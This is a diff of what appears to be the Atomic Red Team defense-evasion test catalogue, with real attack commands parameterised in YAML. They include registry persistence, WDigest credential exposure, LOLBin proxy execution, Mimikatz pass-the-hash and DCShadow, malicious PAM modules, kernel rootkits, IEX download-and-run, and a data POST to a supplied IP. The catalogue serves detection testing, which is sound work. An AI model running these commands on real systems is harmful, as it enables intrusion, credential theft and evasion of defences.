Local Machine - cmd @@ -31113,11 +31113,11 @@ defense-evasion: command: 'reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /t REG_EXPAND_SZ /v SecurityHealth /d #{new_executable} /f -' + ' cleanup_command: 'reg delete HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v SecurityHealth /f >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: Modify registry to store logon credentials @@ -31132,11 +31132,11 @@ defense-evasion: command: 'reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f -' + ' cleanup_command: 'reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: Add domain to Trusted sites Zone 
@@ -31177,11 +31177,11 @@ defense-evasion: command: 'New-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings" -Name T1112 -Value "''" -' + ' name: command_prompt T1218.007: technique: @@ -31683,7 +31683,7 @@ defense-evasion: description: 'Execute arbitrary MSI file. Commonly seen in application installation. The MSI opens notepad.exe when sucessfully executed. -' + ' supported_platforms: - windows input_arguments: @@ -31695,17 +31695,17 @@ defense-evasion: dependencies: - description: 'T1218.msi must exist on disk at specified location (#{msi_payload}) -' + ' prereq_command: 'if (Test-Path #{msi_payload}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host "You must provide your own MSI" -' + ' executor: command: 'msiexec.exe /q /i "#{msi_payload}" -' + ' name: command_prompt - name: Msiexec.exe - Execute Remote MSI file auto_generated_guid: bde7d2fe-d049-458d-a362-abda32a7e649 @@ -31713,7 +31713,7 @@ defense-evasion: in application installation, commonly seen in malware execution. The MSI opens notepad.exe when sucessfully executed. -' + ' supported_platforms: - windows input_arguments: @@ -31724,7 +31724,7 @@ defense-evasion: executor: command: 'msiexec.exe /q /i "#{msi_payload}" -' + ' name: command_prompt - name: Msiexec.exe - Execute Arbitrary DLL auto_generated_guid: 66f64bd5-7c35-4c24-953a-04ca30a0a0ec @@ -31743,17 +31743,17 @@ defense-evasion: dependencies: - description: 'T1218.dll must exist on disk at specified location (#{dll_payload}) -' + ' prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/src/x64/T1218.dll" -OutFile "#{dll_payload}" executor: command: 'msiexec.exe /y "#{dll_payload}" -' + ' name: command_prompt T1564.004: technique: 
@@ -31893,7 +31893,7 @@ defense-evasion: Start-Process -FilePath "$env:comspec" -ArgumentList "/c,type,#{payload_path},>,`"#{ads_file_path}:#{ads_name}`"" cleanup_command: 'Remove-Item "#{ads_file_path}" -Force -ErrorAction Ignore -' + ' name: powershell - name: Create ADS command prompt auto_generated_guid: 17e7637a-ddaf-4a82-8622-377e20de8fdb @@ -31917,7 +31917,7 @@ defense-evasion: for /f "usebackq delims=?" %i in (#{file_name}:#{ads_filename}) do %i cleanup_command: 'del #{file_name} >nul 2>&1 -' + ' name: command_prompt - name: Create ADS PowerShell auto_generated_guid: 0045ea16-ed3c-4d4c-a9ee-15e44d1560d1 @@ -31939,13 +31939,13 @@ defense-evasion: dependencies: - description: 'The file must exist on disk at specified location (#{file_name}) -' + ' prereq_command: 'if (Test-Path #{file_name}) { exit 0 } else { exit 1 } -' + ' get_prereq_command: 'New-Item -Path #{file_name} | Out-Null -' + ' executor: command: | echo "test" > #{file_name} | set-content -path test.txt -stream #{ads_filename} -value "test" @@ -31953,7 +31953,7 @@ defense-evasion: set-content -path . -stream #{ads_filename} -value "test3" cleanup_command: 'Remove-Item -Path #{file_name} -ErrorAction Ignore -' + ' name: powershell T1599.001: technique: @@ -32162,7 +32162,7 @@ defense-evasion: auto_generated_guid: 14c38f32-6509-46d8-ab43-d53e32d2b131 description: 'Add a Network Share utilizing the command_prompt -' + ' supported_platforms: - windows input_arguments: @@ -32179,7 +32179,7 @@ defense-evasion: auto_generated_guid: '09210ad5-1ef2-4077-9ad3-7351e13e9222' description: 'Removes a Network Share utilizing the command_prompt -' + ' supported_platforms: - windows input_arguments: 
@@ -32190,13 +32190,13 @@ defense-evasion: executor: command: 'net share #{share_name} /delete -' + ' name: command_prompt - name: Remove Network Share PowerShell auto_generated_guid: 0512d214-9512-4d22-bde7-f37e058259b3 description: 'Removes a Network Share utilizing PowerShell -' + ' supported_platforms: - windows input_arguments: @@ -32443,14 +32443,14 @@ defense-evasion: cleanup_command: 'Remove-ItemProperty -Force -ErrorAction Ignore -Path #{registry_key_storage} -Name #{registry_entry_storage} -' + ' name: powershell - name: Execution from Compressed File auto_generated_guid: f8c8a909-5f29-49ac-9244-413936ce6d1f description: 'Mimic execution of compressed executable. When successfully executed, calculator.exe will open. -' + ' supported_platforms: - windows input_arguments: @@ -32462,11 +32462,11 @@ defense-evasion: dependencies: - description: 'T1027.exe must exist on disk at $env:temp\temp_T1027.zip\T1027.exe -' + ' prereq_command: 'if (Test-Path $env:temp\temp_T1027.zip\T1027.exe) {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "#{url_path}" -OutFile "$env:temp\T1027.zip" @@ -32474,7 +32474,7 @@ defense-evasion: executor: command: '"%temp%\temp_T1027.zip\T1027.exe" -' + ' cleanup_command: | taskkill /f /im calculator.exe >nul 2>nul rmdir /S /Q %temp%\temp_T1027.zip >nul 2>nul @@ -32508,7 +32508,7 @@ defense-evasion: command: 'Send-MailMessage -From #{sender} -To #{receiver} -Subject ''T1027_Atomic_Test'' -Attachments #{input_file} -SmtpServer #{smtp_server} -' + ' name: powershell - name: DLP Evasion via Sensitive Data in VBA Macro over HTTP auto_generated_guid: e2d85e66-cb66-4ed7-93b1-833fc56c9319 @@ -32529,7 +32529,7 @@ defense-evasion: executor: command: 'Invoke-WebRequest -Uri #{ip_address} -Method POST -Body #{input_file} -' + ' name: powershell - name: Obfuscated Command in PowerShell auto_generated_guid: 8b3f4ed6-077b-4bdd-891c-2d237f19410f 
@@ -32537,7 +32537,7 @@ defense-evasion: "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary. -' + ' supported_platforms: - windows executor: @@ -32548,7 +32548,7 @@ defense-evasion: 120, 157 ,167,145 , 162 ,123,150 ,145 , 154 , 154 , 41,47)| .(''%'') { ( [CHAR] ( $Pz2sB0::"t`OinT`16"(( [sTring]${_}) ,8)))})) ) -' + ' name: powershell - name: Obfuscated Command Line using special Unicode characters auto_generated_guid: e68b945c-52d0-4dd9-a5e8-d173d70c448f @@ -32646,7 +32646,7 @@ defense-evasion: auto_generated_guid: 2430498b-06c0-4b92-a448-8ad263c388e2 description: 'Execute arbitrary DLL file stored locally. -' + ' supported_platforms: - windows input_arguments: @@ -32658,17 +32658,17 @@ defense-evasion: dependencies: - description: 'T1218-2.dll must exist on disk at specified location (#{dll_payload}) -' + ' prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.008/src/Win32/T1218-2.dll" -OutFile "#{dll_payload}" executor: command: 'odbcconf.exe /S /A {REGSVR "#{dll_payload}"} -' + ' name: command_prompt T1134.004: technique: @@ -32781,10 +32781,10 @@ defense-evasion: dependencies: - description: 'DLL to inject must exist on disk at specified location (#{dll_path}) -' + ' prereq_command: 'if (Test-Path #{dll_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{dll_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1134.004/bin/calc.dll" -OutFile "#{dll_path}" 
@@ -32825,7 +32825,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine ''#{command_line}'' -ParentId #{parent_pid}' @@ -32854,7 +32854,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Start-ATHProcessUnderSpecificParent -ParentId #{parent_pid} -TestGuid #{test_guid}' @@ -32884,7 +32884,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Get-CimInstance -ClassName Win32_Process -Property Name, CommandLine, ProcessId -Filter "Name = ''svchost.exe'' AND CommandLine LIKE ''%''" | @@ -32920,7 +32920,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Start-Process -FilePath #{parent_name} -PassThru | Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine ''#{command_line}''' @@ -33005,7 +33005,7 @@ defense-evasion: - description: 'Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) -' + ' prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} if (Test-Path $mimikatz_path) {exit 0} else {exit 1} @@ -33020,13 +33020,13 @@ defense-evasion: command: '#{mimikatz_path} "sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}" -' + ' name: command_prompt - name: crackmapexec Pass the Hash auto_generated_guid: eb05b028-16c8-4ad8-adea-6f5b219da9a9 description: 'command execute with crackmapexec -' + ' supported_platforms: - windows input_arguments: 
@@ -33055,14 +33055,14 @@ defense-evasion: - description: 'CrackMapExec executor must exist on disk at specified location (#{crackmapexec_exe}) -' + ' prereq_command: 'if(Test-Path #{crackmapexec_exe}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host Automated installer not implemented yet, please install crackmapexec manually at this location: #{crackmapexec_exe} -' + ' executor: command: "#{crackmapexec_exe} #{domain} -u #{user_name} -H #{ntlm} -x #{command}\n" name: command_prompt @@ -33143,7 +33143,7 @@ defense-evasion: auto_generated_guid: dbf38128-7ba7-4776-bedf-cc2eed432098 description: 'Similar to PTH, but attacking Kerberos -' + ' supported_platforms: - windows input_arguments: @@ -33151,7 +33151,7 @@ defense-evasion: description: Ticket file name usually format of 'id-username\@domain.kirbi' (e.g. can be dumped by "sekurlsa::tickets /export" module) type: String - default: + default: mimikatz_exe: description: Path of the Mimikatz binary type: Path @@ -33160,10 +33160,10 @@ defense-evasion: dependencies: - description: 'Mimikatz must exist on disk at specified location (#{mimikatz_exe}) -' + ' prereq_command: 'if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href @@ -33174,7 +33174,7 @@ defense-evasion: executor: command: '#{mimikatz_exe} "kerberos::ptt #{ticket}" -' + ' name: command_prompt - name: Rubeus Kerberos Pass The Ticket auto_generated_guid: a2fc4ec5-12c6-4fb4-b661-961f23f359cb 
@@ -33217,19 +33217,19 @@ defense-evasion: dependencies: - description: 'Rubeus must exist on disk at specified location (#{rubeus_path}) -' + ' prereq_command: 'if (Test-Path #{rubeus_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{rubeus_path} -' + ' - description: 'PsExec must exist on disk at specified location (#{psexec_path}) -' + ' prereq_command: 'if (Test-Path #{psexec_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force @@ -33312,7 +33312,7 @@ defense-evasion: description: 'Uses PowerShell to install and register a password filter DLL. Requires a reboot and administrative privileges. -' + ' supported_platforms: - windows input_arguments: @@ -33325,14 +33325,14 @@ defense-evasion: - description: 'AtomicPasswordFilter.dll must exist on disk at specified location (#{input_dll}) -' + ' prereq_command: 'if (Test-Path #{input_dll}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host "You must provide your own password filter dll" -' + ' executor: command: | $passwordFilterName = (Copy-Item "#{input_dll}" -Destination "C:\Windows\System32" -PassThru).basename @@ -33754,10 +33754,10 @@ defense-evasion: elevation_required: true command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf} -' + ' cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf} -' + ' - name: Malicious PAM module auto_generated_guid: 65208808-3125-4a2e-8389-a0a00e9ab326 description: | 
@@ -33791,35 +33791,35 @@ defense-evasion: - description: 'The PAM development library must be installed to build the PAM module -' + ' prereq_command: 'if [ -f /usr/include/security/pam_modules.h ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'if [ -n "`which apt-get`" ]; then sudo apt-get -y install libpam0g-dev; elif [ -n "`which yum`" ]; then sudo yum -y install pam-devel; fi -' + ' - description: 'The PAM module must exist on disk at specified location (#{path_to_pam_module}) -' + ' prereq_command: 'if [ -f #{path_to_pam_module} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'sudo gcc -shared -fPIC -o #{path_to_pam_module} #{path_to_pam_module_source} -' + ' executor: name: sh elevation_required: true command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf} -' + ' cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf} -' + ' T1205.001: technique: external_references: @@ -34256,13 +34256,13 @@ defense-evasion: cleanup_command: 'Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore -' + ' name: powershell - name: RunPE via VBA auto_generated_guid: 3ad4a037-1598-4136-837c-4027e4fa319b description: 'This module executes notepad.exe from within the WINWORD.EXE process -' + ' supported_platforms: - windows input_arguments: @@ -34274,7 +34274,7 @@ defense-evasion: dependencies: - description: 'Microsoft #{ms_product} must be installed -' + ' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -34285,7 +34285,7 @@ defense-evasion: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" -' + ' executor: command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" 
@@ -34408,7 +34408,7 @@ defense-evasion: dependencies: - description: 'The 64-bit version of Microsoft Office must be installed -' + ' prereq_command: | try { $wdApp = New-Object -COMObject "Word.Application" @@ -34419,7 +34419,7 @@ defense-evasion: get_prereq_command: 'Write-Host "You will need to install Microsoft Word (64-bit) manually to meet this requirement" -' + ' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -34454,7 +34454,7 @@ defense-evasion: - description: 'Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) -' + ' prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} if (Test-Path $mimikatz_path) {exit 0} else {exit 1} @@ -34469,10 +34469,10 @@ defense-evasion: - description: 'PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_path}) -' + ' prereq_command: 'if (Test-Path "#{psexec_path}") { exit 0} else { exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" @@ -34483,7 +34483,7 @@ defense-evasion: command: '#{psexec_path} /accepteula \\#{machine} -c #{mimikatz_path} "lsadump::lsa /inject /id:500" "exit" -' + ' name: command_prompt elevation_required: false T1055.008: @@ -34618,7 +34618,7 @@ defense-evasion: description: 'Executes the signed PubPrn.vbs script with options to download and execute an arbitrary payload. -' + ' supported_platforms: - windows input_arguments: @@ -34630,7 +34630,7 @@ defense-evasion: command: 'cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "script:#{remote_payload}" -' + ' name: command_prompt T1542.004: technique: 
@@ -34853,7 +34853,7 @@ defense-evasion: description: 'Executes the Uninstall Method, No Admin Rights Required. Upon execution, "I shouldn''t really execute either." will be displayed. -' + ' supported_platforms: - windows input_arguments: @@ -34870,10 +34870,10 @@ defense-evasion: - description: 'The CSharp source file must exist on disk at specified location (#{source_file}) -' + ' prereq_command: 'if (Test-Path #{source_file}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{source_file}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.009/src/T1218.009.cs" -OutFile "#{source_file}" @@ -34883,7 +34883,7 @@ defense-evasion: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U #{output_file} cleanup_command: 'del #{output_file} >nul 2>&1 -' + ' name: command_prompt - name: Regsvcs Uninstall Method Call Test auto_generated_guid: fd3c1c6a-02d2-4b72-82d9-71c527abb126 @@ -34906,10 +34906,10 @@ defense-evasion: - description: 'The CSharp source file must exist on disk at specified location (#{source_file}) -' + ' prereq_command: 'if (Test-Path #{source_file}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{source_file}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.009/src/T1218.009.cs" -OutFile "#{source_file}" @@ -34998,7 +34998,7 @@ defense-evasion: description: 'Regsvr32.exe is a command-line program used to register and unregister OLE controls. Upon execution, calc.exe will be launched. -' + ' supported_platforms: - windows input_arguments: 
@@ -35018,10 +35018,10 @@ defense-evasion: dependencies: - description: 'Regsvr32.sct must exist on disk at specified location (#(unknown)) -' + ' prereq_command: 'if (Test-Path #(unknown)) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #(unknown)) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/src/RegSvr32.sct" -OutFile "#(unknown)" @@ -35056,7 +35056,7 @@ defense-evasion: description: 'Regsvr32.exe is a command-line program used to register and unregister OLE controls. Upon execution, calc.exe will be launched. -' + ' supported_platforms: - windows input_arguments: @@ -35077,10 +35077,10 @@ defense-evasion: - description: 'AllTheThingsx86.dll must exist on disk at specified location (#{dll_name}) -' + ' prereq_command: 'if (Test-Path #{dll_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{dll_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/bin/AllTheThingsx86.dll" -OutFile "#{dll_name}" @@ -35088,14 +35088,14 @@ defense-evasion: command: 'IF "%PROCESSOR_ARCHITECTURE%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe /s #{dll_name}) ELSE ( #{regsvr32path}\#{regsvr32name} /s #{dll_name} ) -' + ' name: command_prompt - name: Regsvr32 Registering Non DLL auto_generated_guid: 1ae5ea1f-0a4e-4e54-b2f5-4ac328a7f421 description: 'Replicating observed Gozi maldoc behavior registering a dll with an altered extension -' + ' supported_platforms: - windows input_arguments: @@ -35115,13 +35115,13 @@ defense-evasion: dependencies: - description: 'Test requires a renamed dll file -' + ' prereq_command: 'if exist #{dll_file} ( exit 0 ) else ( exit 1 ) -' + ' get_prereq_command: 'copy "C:\Windows\System32\shell32.dll" "#{dll_file}" -' + ' executor: name: command_prompt elevation_required: false 
@@ -35237,7 +35237,7 @@ defense-evasion: %SystemRoot%\Temp\lsass.exe /B cleanup_command: 'del /Q /F %SystemRoot%\Temp\lsass.exe >nul 2>&1 -' + ' name: command_prompt - name: Masquerading as Linux crond process. auto_generated_guid: a315bfff-7a98-403b-b442-2ea1b255e556 @@ -35253,7 +35253,7 @@ defense-evasion: echo 'sleep 5' | /tmp/crond cleanup_command: 'rm /tmp/crond -' + ' name: sh - name: Masquerading - cscript.exe running as notepad.exe auto_generated_guid: 3a2a578b-0a01-46e4-92e3-62e2859b42f0 @@ -35269,7 +35269,7 @@ defense-evasion: cmd.exe /c %APPDATA%\notepad.exe /B cleanup_command: 'del /Q /F %APPDATA%\notepad.exe >nul 2>&1 -' + ' name: command_prompt - name: Masquerading - wscript.exe running as svchost.exe auto_generated_guid: 24136435-c91a-4ede-9da1-8b284a1c1a23 @@ -35285,7 +35285,7 @@ defense-evasion: cmd.exe /c %APPDATA%\svchost.exe /B cleanup_command: 'del /Q /F %APPDATA%\svchost.exe >nul 2>&1 -' + ' name: command_prompt - name: Masquerading - powershell.exe running as taskhostw.exe auto_generated_guid: ac9d0fc3-8aa8-4ab5-b11f-682cd63b40aa @@ -35301,7 +35301,7 @@ defense-evasion: cmd.exe /K %APPDATA%\taskhostw.exe cleanup_command: 'del /Q /F %APPDATA%\taskhostw.exe >nul 2>&1 -' + ' name: command_prompt - name: Masquerading - non-windows exe running as windows exe auto_generated_guid: bc15c13f-d121-4b1f-8c7d-28d95854d086 @@ -35324,10 +35324,10 @@ defense-evasion: dependencies: - description: 'Exe file to copy must exist on disk at specified location (#{inputfile}) -' + ' prereq_command: 'if (Test-Path #{inputfile}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{inputfile}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036.003/bin/T1036.003.exe" -OutFile "#{inputfile}" 
@@ -35338,14 +35338,14 @@ defense-evasion: Stop-Process -ID $myT1036_003 cleanup_command: 'Remove-Item #{outputfile} -Force -ErrorAction Ignore -' + ' name: powershell - name: Masquerading - windows exe running as different windows exe auto_generated_guid: c3d24a39-2bfe-4c6a-b064-90cd73896cb0 description: 'Copies a windows exe, renames it as another windows exe, and launches it to masquerade as second windows exe -' + ' supported_platforms: - windows input_arguments: @@ -35364,7 +35364,7 @@ defense-evasion: Stop-Process -ID $myT1036_003 cleanup_command: 'Remove-Item #{outputfile} -Force -ErrorAction Ignore -' + ' name: powershell - name: Malicious process Masquerading as LSM.exe auto_generated_guid: 83810c46-f45e-4485-9ab6-8ed0e9e6ed7f @@ -35646,7 +35646,7 @@ defense-evasion: - description: 'Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) -' + ' prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} if (Test-Path $mimikatz_path) {exit 0} else {exit 1} @@ -35660,10 +35660,10 @@ defense-evasion: - description: 'PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_path}) -' + ' prereq_command: 'if (Test-Path "#{psexec_path}") { exit 0} else { exit 1} -' + ' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force @@ -35696,7 +35696,7 @@ defense-evasion: Write-Host "End of DCShadow" cleanup_command: 'Stop-Process -Name "mimikatz" -Force -ErrorAction Ignore -' + ' T1014: technique: id: attack-pattern--0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b @@ -35774,7 +35774,7 @@ defense-evasion: auto_generated_guid: dfb50072-e45a-4c75-a17e-a484809c8553 description: 'Loadable Kernel Module based Rootkit -' + ' supported_platforms: - linux input_arguments: 
@@ -35799,10 +35799,10 @@ defense-evasion: dependencies: - description: 'The kernel module must exist on disk at specified location (#{rootkit_path}) -' + ' prereq_command: 'if [ -f #{rootkit_path} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: | if [ ! -d #{temp_folder} ]; then mkdir #{temp_folder}; touch #{temp_folder}/safe_to_delete; fi; cp #{rootkit_source_path}/* #{temp_folder}/ @@ -35812,17 +35812,17 @@ defense-evasion: executor: command: 'sudo insmod #{rootkit_path} -' + ' cleanup_command: 'sudo rmmod #{rootkit_name} -' + ' name: sh elevation_required: true - name: Loadable Kernel Module based Rootkit auto_generated_guid: 75483ef8-f10f-444a-bf02-62eb0e48db6f description: 'Loadable Kernel Module based Rootkit -' + ' supported_platforms: - linux input_arguments: @@ -35847,11 +35847,11 @@ defense-evasion: dependencies: - description: 'The kernel module must exist on disk at specified location (#{rootkit_path}) -' + ' prereq_command: 'if [ -f /lib/modules/$(uname -r)/#{rootkit_name}.ko ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: "if [ ! -d #{temp_folder} ]; then mkdir #{temp_folder}; touch #{temp_folder}/safe_to_delete; fi;\ncp #{rootkit_source_path}/* #{temp_folder}/\ncd #{temp_folder}; make \nsudo cp #{temp_folder}/#{rootkit_name}.ko @@ -35860,7 +35860,7 @@ defense-evasion: executor: command: 'sudo modprobe #{rootkit_name} -' + ' cleanup_command: | sudo modprobe -r #{rootkit_name} sudo rm /lib/modules/$(uname -r)/#{rootkit_name}.ko @@ -35990,7 +35990,7 @@ defense-evasion: description: 'Test execution of a remote script using rundll32.exe. Upon execution notepad.exe will be opened. -' + ' supported_platforms: - windows input_arguments: @@ -36001,7 +36001,7 @@ defense-evasion: executor: command: 'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec(); -' + ' name: command_prompt - name: Rundll32 execute VBscript command auto_generated_guid: 638730e7-7aed-43dc-bf8c-8117f805f5bb 
@@ -36019,7 +36019,7 @@ defense-evasion: executor: command: 'rundll32 vbscript:"\..\mshtml,RunHTMLApplication "+String(CreateObject("WScript.Shell").Run("#{command_to_execute}"),0) -' + ' name: command_prompt - name: Rundll32 advpack.dll Execution auto_generated_guid: d91cae26-7fc1-457b-a854-34c8aad48c89 @@ -36038,17 +36038,17 @@ defense-evasion: dependencies: - description: 'Inf file must exist on disk at specified location (#{inf_to_execute}) -' + ' prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011.inf" -OutFile "#{inf_to_execute}" executor: command: 'rundll32.exe advpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1, -' + ' name: command_prompt - name: Rundll32 ieadvpack.dll Execution auto_generated_guid: 5e46a58e-cbf6-45ef-a289-ed7754603df9 @@ -36068,17 +36068,17 @@ defense-evasion: dependencies: - description: 'Inf file must exist on disk at specified location (#{inf_to_execute}) -' + ' prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011.inf" -OutFile "#{inf_to_execute}" executor: command: 'rundll32.exe ieadvpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1, -' + ' name: command_prompt - name: Rundll32 syssetup.dll Execution auto_generated_guid: 41fa324a-3946-401e-bbdd-d7991c628125 
@@ -36097,10 +36097,10 @@ defense-evasion: dependencies: - description: 'Inf file must exist on disk at specified location (#{inf_to_execute}) -' + ' prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011_DefaultInstall.inf" -OutFile "#{inf_to_execute}" @@ -36108,7 +36108,7 @@ defense-evasion: command: 'rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 .\#{inf_to_execute} -' + ' name: command_prompt - name: Rundll32 setupapi.dll Execution auto_generated_guid: 71d771cd-d6b3-4f34-bc76-a63d47a10b19 @@ -36127,10 +36127,10 @@ defense-evasion: dependencies: - description: 'Inf file must exist on disk at specified location (#{inf_to_execute}) -' + ' prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011_DefaultInstall.inf" -OutFile "#{inf_to_execute}" @@ -36138,7 +36138,7 @@ defense-evasion: command: 'rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 .\#{inf_to_execute} -' + ' name: command_prompt - name: Execution of HTA and VBS Files using Rundll32 and URL.dll auto_generated_guid: 22cfde89-befe-4e15-9753-47306b37a6e3 @@ -36161,7 +36161,7 @@ defense-evasion: description: 'Executes the LaunchApplication function in pcwutl.dll to proxy execution of an executable. -' + ' supported_platforms: - windows input_arguments: @@ -36172,7 +36172,7 @@ defense-evasion: executor: command: 'rundll32.exe pcwutl.dll,LaunchApplication #{exe_to_launch} -' + ' name: command_prompt T1134.005: technique: 
